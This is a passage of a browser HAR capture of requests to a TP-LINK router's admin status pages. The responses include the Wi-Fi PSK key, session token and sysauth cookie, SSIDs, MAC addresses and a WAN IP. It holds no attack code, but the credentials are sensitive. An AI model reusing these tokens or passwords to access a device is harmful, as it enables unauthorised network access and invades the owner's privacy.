n_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 274,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 681,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:19.654+03:00\",\r\n \"time\": 1814,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 266,\r\n \"dns\": 251,\r\n \"connect\": 532,\r\n \"send\": 0,\r\n \"wait\": 761,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:29.645+03:00\",\r\n \"time\": 952,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.08,\\\"wan_ipv4_ipaddr\\\":\\\"187.60.220.34\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 657,\r\n \"receive\": 24\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:29.648+03:00\",\r\n \"time\": 1798,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 268,\r\n \"dns\": 250,\r\n \"connect\": 524,\r\n \"send\": 0,\r\n \"wait\": 748,\r\n \"receive\": 8\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:11:39.644+03:00\",\r\n \"time\": 997,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"